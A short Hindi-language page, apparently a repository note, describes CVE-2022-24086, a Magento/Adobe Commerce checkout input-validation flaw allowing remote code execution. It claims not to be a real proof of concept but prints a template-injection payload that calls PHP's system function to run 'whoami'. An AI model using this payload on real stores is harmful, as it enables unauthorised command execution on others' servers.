
Magento RCE के बारे में CVE-2022-24086
CVE-2022-24086 मैगेंटो RCE के बारे में
Adobe Commerce संस्करण 2.4.3-p1 (और पुराने) और 2.3.7-p2 (और पुराने) चेकआउट प्रक्रिया के दौरान अनुचित इनपुट सत्यापन भेद्यता से प्रभावित हैं। इस समस्या के शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं होती है और इसके परिणामस्वरूप मनमाना कोड निष्पादन हो सकता है।
सूचना: यह वास्तविक POC नहीं है ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}